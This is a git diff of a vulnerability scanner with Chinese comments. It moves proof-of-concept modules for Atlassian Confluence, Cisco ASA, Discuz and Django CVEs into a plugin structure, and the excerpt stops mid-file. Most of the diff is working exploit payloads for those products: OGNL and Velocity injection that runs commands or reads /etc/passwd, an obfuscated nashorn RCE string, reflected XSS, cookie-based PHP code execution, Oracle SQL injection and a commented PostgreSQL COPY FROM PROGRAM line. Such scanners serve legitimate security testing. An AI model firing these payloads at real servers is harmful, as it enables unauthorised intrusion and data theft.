-        'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:\Windows\System32\drivers\etc\hosts"}}}',
-    },
-    {
-        'path': 'rest/tinymce/1/macro/preview',
-        'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:/Windows/System32/drivers/etc/hosts"}}}',
-    },
-    {
-        'path': 'rest/tinymce/1/macro/preview',
-        'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"../web.xml"}}}',
-    }
-]
-
-def cve_2019_3396_scan(clients):
-    ''' Atlassian Confluence 6.14.2 版本之前存在未经授权的目录遍历漏洞, 
-        攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'AtlassianConfluence',
-        # 'vul_type' = 'FileRead/RCE',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2019-3396',
-    }
-
-    headers = {
-        'Content-Type': 'application/json; charset=utf-8',
-        'Referer': client.protocol_domain
-    }
-
-    for payload in cve_2019_3396_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-            # (check.check_res(res.text, self.md))
-        if (check.check_res_fileread(res.text)
-            or (('<?xml version="1.0" encoding="UTF-8"?>' in res.text) 
-                and ('Confluence' in res.text))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/AtlassianConfluence/cve_2021_26084.py b/payloads/AtlassianConfluence/cve_2021_26084.py
deleted file mode 100644
index c585e90..0000000
--- a/payloads/AtlassianConfluence/cve_2021_26084.py
+++ /dev/null
@@ -1,61 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_int_2
-from lib.tool import check
-
-random_num_1, random_num_2 = random_int_2()
-
-cve_2021_26084_payloads = [
-    {
-        'path': 'pages/doenterpagevariables.action',
-        'data': 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat%20/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027',
-    },
-    {
-        'path': 'pages/doenterpagevariables.action',
-        'data': 'queryString=%5cu0027%2b%7b{NUM1}*{NUM2}%7d%2b%5cu0027'.format(NUM1=random_num_1, NUM2=random_num_2),
-    }
-]
-
-def cve_2021_26084_scan(clients):
-    ''' Confluence存在一个OGNL注入漏洞, 
-        允许未经身份验证的攻击者在Confluence服务器或数据中心实例上执行任意代码
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'AtlassianConfluence',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2021-26084',
-    }
-    
-    headers = {
-        'Referer': client.protocol_domain
-    }
-
-    for payload in cve_2021_26084_payloads:        
-        path = payload['path']
-        data = payload['data']
-        
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        random_num_sum = random_num_1 * random_num_2
-        if (check.check_res_fileread(res.text)
-            or (str(random_num_sum) in res.text)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/AtlassianConfluence/cve_2022_26134.py b/payloads/AtlassianConfluence/cve_2022_26134.py
deleted file mode 100644
index 673b057..0000000
--- a/payloads/AtlassianConfluence/cve_2022_26134.py
+++ /dev/null
@@ -1,64 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-import base64
-
-cve_2022_26134_payloads = [
-    {'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{RCECOMMAND}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'},
-    {'path': '%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Confluence%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C114%2C101%2C113%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C99%2C111%2C109%2C46%2C111%2C112%2C101%2C110%2C115%2C121%2C109%2C112%2C104%2C111%2C110%2C121%2C46%2C119%2C101%2C98%2C119%2C111%2C114%2C107%2C46%2C83%2C101%2C114%2C118%2C108%2C101%2C116%2C65%2C99%2C116%2C105%2C111%2C110%2C67%2C111%2C110%2C116%2C101%2C120%2C116%2C46%2C103%2C101%2C116%2C82%2C101%2C113%2C117%2C101%2C115%2C116%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C99%2C109%2C100%2C61%2C114%2C101%2C113%2C46%2C103%2C101%2C116%2C80%2C97%2C114%2C97%2C109%2C101%2C116%2C101%2C114%2C40%2C34%2C115%2C101%2C97%2C114%2C99%2C104%2C34%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C59%2C13%2C10%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C110%2C101%2C119%2C32%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C83%2C99%2C97%2C110%2C110%2C101%2C114%2C40%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C101%2C120%2C101%2C99%2C40%2C99%2C109%2C100%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C41%2C46%2C117%2C115%2C101%2C68%2C101%2C108%2C105%2C109%2C105%2C116%2C101%2C114%2C40%2C34%2C92%2C92%2C65%2C34%2C41%2C46%2C110%2C101%2C120%2C116%2C40%2C41%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/?search={RCECOMMAND}'}
-]
-
-def cve_2022_26134_scan(clients):
-    ''' 2022年6月2日Atlassian官方发布了一则安全更新, 通告了一个严重且已在野利用的代码执行漏洞, 
-        攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'AtlassianConfluence',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2022-26134',
-    }
-    
-    headers = {
-        'Referer': client.protocol_domain
-    }
-
-    for payload in cve_2022_26134_payloads:
-        random_str = random_md5(6)
-        RCEcommand = 'echo%20' + random_str
-        
-        path = payload['path'].format(RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'get',
-            path,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        x_cmd_response = res.headers.get('X-Cmd-Response', '')
-        x_confluence = base64.b64decode(res.headers.get('X-Confluence', '')).decode()
-
-        if (check.check_res(x_cmd_response, random_str)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-        elif (check.check_res(x_confluence, random_str)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Response-Headers': 'X-Confluence: XXX',
-                'Response-Decode': 'Base64',
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/AtlassianConfluence/main.py b/payloads/AtlassianConfluence/main.py
deleted file mode 100644
index dce580f..0000000
--- a/payloads/AtlassianConfluence/main.py
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    Atlassian Confluence扫描类: 
-        1. Confluence路径遍历和命令执行
-            CVE-2019-3396
-                Payload: https://vulhub.org/#/environments/confluence/CVE-2019-3396/
-
-        2. Confluence Server Webwork Pre-Auth OGNL表达式命令注入
-            CVE-2021-26084
-                Payload: https://vulhub.org/#/environments/confluence/CVE-2021-26084/
-
-        3. Confluence任意文件包含
-            CVE-2015-8399
-                Payload: https://blog.csdn.net/caiqiiqi/article/details/106004003
-
-        4. Confluence远程代码执行
-            CVE-2022-26134
-                Payload-1: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
-                Payload-2: https://github.com/SNCKER/CVE-2022-26134
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-file:///C:/Windows/System32/drivers/etc/hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.AtlassianConfluence.cve_2015_8399 import cve_2015_8399_scan
-from payloads.AtlassianConfluence.cve_2019_3396 import cve_2019_3396_scan
-from payloads.AtlassianConfluence.cve_2021_26084 import cve_2021_26084_scan
-from payloads.AtlassianConfluence.cve_2022_26134 import cve_2022_26134_scan
-
-class AtlassianConfluence():
-    def __init__(self):
-        self.app_name = 'AtlassianConfluence'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2015_8399_scan, clients=clients),
-            thread(target=cve_2019_3396_scan, clients=clients),
-            thread(target=cve_2021_26084_scan, clients=clients),
-            thread(target=cve_2022_26134_scan, clients=clients)
-        ]
-
-confluence = AtlassianConfluence()
diff --git a/payloads/Cisco/cisco-cve-2020-3580-xss.py b/payloads/Cisco/cisco-cve-2020-3580-xss.py
new file mode 100644
index 0000000..6f98ba8
--- /dev/null
+++ b/payloads/Cisco/cisco-cve-2020-3580-xss.py
@@ -0,0 +1,73 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Cisco ASA设备/FTD设备 XSS跨站脚本攻击
+    CVE-2020-3580
+
+Cisco ASA设备/FTD设备 XSS跨站脚本攻击 (反射型)
+'''
+
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': '+CSCOE+/saml/sp/acs?tgname=a',
+                'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e'
+            },
+            {
+                'path': 'saml/sp/acs?tgname=a',
+                'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e'
+            },
+            {
+                'path': 'sp/acs?tgname=a',
+                'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e'
+            },
+            {
+                'path': 'acs?tgname=a',
+                'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e'
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Cisco',
+            'vul_type': 'XSS',
+            'vul_id': 'CVE-2020-3580',
+        }
+
+        for payload in self.payloads:         # * Payload
+            random_str = random_md5(8)
+            
+            path = payload['path']                          # * Path
+            data = payload['data'].format(TEXT=random_str)  # * Data
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (("onload=confirm('" + random_str + "')") in res.text):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Cisco/cve_2020_3580.py b/payloads/Cisco/cve_2020_3580.py
deleted file mode 100644
index b25af64..0000000
--- a/payloads/Cisco/cve_2020_3580.py
+++ /dev/null
@@ -1,61 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-# from lib.tool import check
-
-cve_2020_3580_payloads = [
-    {
-        'path': '+CSCOE+/saml/sp/acs?tgname=a',
-        'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e'
-    },
-    {
-        'path': 'saml/sp/acs?tgname=a',
-        'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e'
-    },
-    {
-        'path': 'sp/acs?tgname=a',
-        'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e'
-    },
-    {
-        'path': 'acs?tgname=a',
-        'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e'
-    }
-]
-
-def cve_2020_3580_scan(clients):
-    ''' Cisco ASA设备/FTD设备 XSS跨站脚本攻击
-            反射型
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Cisco',
-        'vul_type': 'XSS',
-        'vul_id': 'CVE-2020-3580',
-    }
-
-    for payload in cve_2020_3580_payloads:         # * Payload
-        random_str = random_md5(8)
-        
-        path = payload['path']                          # * Path
-        data = payload['data'].format(TEXT=random_str)  # * Data
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (("onload=confirm('" + random_str + "')") in res.text):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Cisco/main.py b/payloads/Cisco/main.py
deleted file mode 100644
index 4bc7383..0000000
--- a/payloads/Cisco/main.py
+++ /dev/null
@@ -1,26 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    Cisco相关设备/页面扫描类: 
-        Cisco ASA设备/FTD设备 XSS跨站脚本攻击
-            CVE-2020-3580
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Cisco.cve_2020_3580 import cve_2020_3580_scan
-
-class Cisco():
-    def __init__(self):
-        self.app_name = 'Cisco'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2020_3580_scan, clients=clients)
-        ]
-
-cisco = Cisco()
\ No newline at end of file
diff --git a/payloads/Discuz/discuz-wooyun-2010-080723-rce.py b/payloads/Discuz/discuz-wooyun-2010-080723-rce.py
new file mode 100644
index 0000000..b066428
--- /dev/null
+++ b/payloads/Discuz/discuz-wooyun-2010-080723-rce.py
@@ -0,0 +1,76 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Discuz!论坛(BBS)是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台: https://discuz.dismall.com
+    Discuz 全局变量防御绕过导致代码执行
+        wooyun-2010-080723
+            Payload: https://vulhub.org/#/environments/discuz/wooyun-2010-080723/
+
+由于php5.3.x版本里php.ini的设置里request_order默认值为GP,
+    导致$_REQUEST中不再包含$_COOKIE, 
+    我们通过在Cookie中传入$GLOBALS来覆盖全局变量, 可以造成代码执行漏洞。
+'''
+
+from lib.tool.md5 import random_int_1
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'viewthread.php?tid=10&extra=page%3D1',
+                'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'}
+            },
+            {
+                'path': '?tid=10&extra=page%3D1',
+                'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'}
+            },
+            {
+                'path': '',
+                'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'}
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Discuz',
+            'vul_type': 'RCE',
+            'vul_id': 'wooyun-2010-080723',
+        }
+
+        for payload in self.payloads:
+            random_str = str(random_int_1(6))
+            RCEcommand = 'print_r(' + random_str + ')'
+            
+            path = payload['path']
+            headers = payload['headers']
+            headers['Cookie'] = headers['Cookie'].format(RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'get',
+                path,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, random_str, 'print_r')):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Discuz/main.py b/payloads/Discuz/main.py
deleted file mode 100644
index 51ea23f..0000000
--- a/payloads/Discuz/main.py
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Discuz!论坛(BBS)是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台: https://discuz.dismall.com
-    Discuz扫描类: 
-        1. Discuz 全局变量防御绕过导致代码执行
-            wooyun-2010-080723
-                Payload: https://vulhub.org/#/environments/discuz/wooyun-2010-080723/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Discuz.wooyun_2010_080723 import wooyun_2010_080723_scan
-
-class Discuz():
-    def __init__(self):
-        self.app_name = 'Discuz'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=wooyun_2010_080723_scan, clients=clients)
-        ]
-
-discuz = Discuz()
diff --git a/payloads/Discuz/wooyun_2010_080723.py b/payloads/Discuz/wooyun_2010_080723.py
deleted file mode 100644
index 7317f15..0000000
--- a/payloads/Discuz/wooyun_2010_080723.py
+++ /dev/null
@@ -1,61 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_int_1
-from lib.tool import check
-
-wooyun_2010_080723_payloads = [
-    {
-        'path': 'viewthread.php?tid=10&extra=page%3D1',
-        'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'}
-    },
-    {
-        'path': '?tid=10&extra=page%3D1',
-        'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'}
-    },
-    {
-        'path': '',
-        'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'}
-    },
-]
-
-def wooyun_2010_080723_scan(clients):
-    ''' 
-        由于php5.3.x版本里php.ini的设置里request_order默认值为GP,
-        导致$_REQUEST中不再包含$_COOKIE, 
-        我们通过在Cookie中传入$GLOBALS来覆盖全局变量, 可以造成代码执行漏洞。
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Discuz',
-        'vul_type': 'RCE',
-        'vul_id': 'wooyun-2010-080723',
-    }
-
-    for payload in wooyun_2010_080723_payloads:
-        random_str = str(random_int_1(6))
-        RCEcommand = 'print_r(' + random_str + ')'
-        
-        path = payload['path']
-        headers = payload['headers']
-        headers['Cookie'] = headers['Cookie'].format(RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'get',
-            path,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res(res.text, random_str, 'print_r')):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Django/cve_2017_12794.py b/payloads/Django/cve_2017_12794.py
deleted file mode 100644
index a5b6eef..0000000
--- a/payloads/Django/cve_2017_12794.py
+++ /dev/null
@@ -1,65 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-# from lib.tool import check
-
-cve_2017_12794_payloads = [
-    {'path': '{URLCONF}/?username=<ScRiPt>prompt(\'{TEXT}\')</sCrIpt>'},
-    # {'path': 'create_user/?username=<ScRiPt>prompt(\'{TEXT}\')</sCrIpt>'},
-    # {'path': '?username=<ScRiPt>prompt(\'{TEXT}\')</sCrIpt>'},
-]
-
-def cve_2017_12794_scan(self, clients):
-    '''Django debug page XSS漏洞
-            构造url创建新用户, 同时拼接xss语句, 得到已创建的提示;
-            此时再次访问该链接(即创建同一个xss用户), 将触发恶意代码
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'XSS',
-        'vul_id': 'CVE-2017-12794',
-    }
-    
-    urlConfList = self.get_urlconf(client, vul_info)     # * 获取Django定义的URL路径
-    if not urlConfList:
-        return None
-    
-    for payload in cve_2017_12794_payloads:        # * Payload
-        for urlConf in urlConfList:
-            random_str = random_md5(5)             # * 随机5位字符串
-            
-            path = payload['path'].format(URLCONF=urlConf, TEXT=random_str)  # * Path
-
-            res1 = client.request(
-                'get',
-                path,
-                vul_info=vul_info
-            )
-            if res1 is None:
-                continue
-
-            # * 该XSS漏洞的特性, 需要请求2次, 2次的payload必须一模一样
-            res2 = client.request(
-                'get',
-                path,
-                vul_info=vul_info
-            )
-            if res2 is None:
-                continue
-
-            text_1 = "<ScRiPt>prompt('" + random_str + "')"
-            text_2 = "<ScRiPt>confirm('" + random_str + "')"
-            
-            if (text_1 in res2.text
-                or text_2 in res2.text
-            ):
-                results = {
-                    'Target': res2.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request': res2
-                }
-                return results
-    return None
diff --git a/payloads/Django/cve_2018_14574.py b/payloads/Django/cve_2018_14574.py
deleted file mode 100644
index 4b9dd6e..0000000
--- a/payloads/Django/cve_2018_14574.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-# from lib.tool import check
-
-cve_2018_14574_payloads = [
-    {'path': '/www.example.com'}
-]
-
-def cve_2018_14574_scan(self, clients):
-    ''' 如果 django.middleware.common.CommonMiddleware和 APPEND_SLASH设置都已启用; 
-        如果项目的 URL 模式接受任何以斜杠结尾的路径, 则对该站点的恶意制作的 URL 的请求可能会导致重定向到另一个站点; 
-        从而启用网络钓鱼和其他攻击
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'Redirect',
-        'vul_id': 'CVE-2018-14574',
-    }
-
-    for payload in cve_2018_14574_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (res.headers.get('Location')
-            and ('//www.example.com/' in res.headers.get('Location', ''))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Django/cve_2019_14234.py b/payloads/Django/cve_2019_14234.py
deleted file mode 100644
index 452a109..0000000
--- a/payloads/Django/cve_2019_14234.py
+++ /dev/null
@@ -1,53 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-# from lib.tool import check
-
-cve_2019_14234_payloads = [
-    {'path': '{URLCONF}/?detail__a\'b=123'},
-    # {'path': 'admin/vuln/collection/?detail__a\'b=123'},
-    # {'path': 'vuln/collection/?detail__a\'b=123'},
-    # {'path': 'collection/?detail__a\'b=123'},
-    # {'path': '?detail__a\'b=123'},
-    # {   # * 配合CVE-2019-9193完成Getshell
-    #     'path': "?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'touch /tmp/test.txt'--%20",
-    # }
-]
-
-def cve_2019_14234_scan(self, clients):
-    ''' Django JSONfield sql注入漏洞
-            需要登录, 并进入当前用户的目录下
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'SQLinject',
-        'vul_id': 'CVE-2019-14234',
-    }
-    
-    urlConfList = self.get_urlconf(client, vul_info)     # * 获取Django定义的URL路径
-    if not urlConfList:
-        return None
-
-    for payload in cve_2019_14234_payloads:
-        for urlConf in urlConfList:
-            path = payload['path'].format(URLCONF=urlConf)
-            url = client.protocol_domain + '/'
-
-            res = client.request(
-                'get',
-                url + path,
-                vul_info=vul_info
-            )
-            if res is None:
-                continue
-
-            if (('ProgrammingError' in res.text) or ('Request information' in res.text)):
-                results = {
-                    'Target': res.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request': res
-                }
-                return results
-    return None
diff --git a/payloads/Django/cve_2020_9402.py b/payloads/Django/cve_2020_9402.py
deleted file mode 100644
index 74a570a..0000000
--- a/payloads/Django/cve_2020_9402.py
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-# from lib.tool import check
-
-cve_2020_9402_payloads = [
-    {'path': '{URLCONF}/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1+1'},
-    {'path': '{URLCONF}/?q=0.05))) FROM "VULN_COLLECTION2"  where  (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null  --'},
-    # {'path': '?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1+1'},
-    # {'path': '?q=0.05))) FROM "VULN_COLLECTION2"  where  (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null  --'},
-]
-
-def cve_2020_9402_scan(self, clients):
-    ''' 该漏洞需要开发者使用JSONField/HStoreField, 可以控制查询集的字段名称; 
-        Django的内置应用程序 Django-Admin 受到影响  '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'SQLinject',
-        'vul_id': 'CVE-2020-9402',
-    }
-    
-    urlConfList = self.get_urlconf(client, vul_info)     # * 获取Django定义的URL路径
-    if not urlConfList:
-        return None
-    
-    for payload in cve_2020_9402_payloads:
-        for urlConf in urlConfList:
-            path = payload['path'].format(URLCONF=urlConf)
-            url = client.protocol_domain + '/'
-
-            res = client.request(
-                'get',
-                url + path,
-                vul_info=vul_info
-            )
-            if res is None:
-                continue
-
-            if (('DatabaseError' in res.text) and ('Request information' in res.text)):
-                results = {
-                    'Target': res.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request': res
-                }
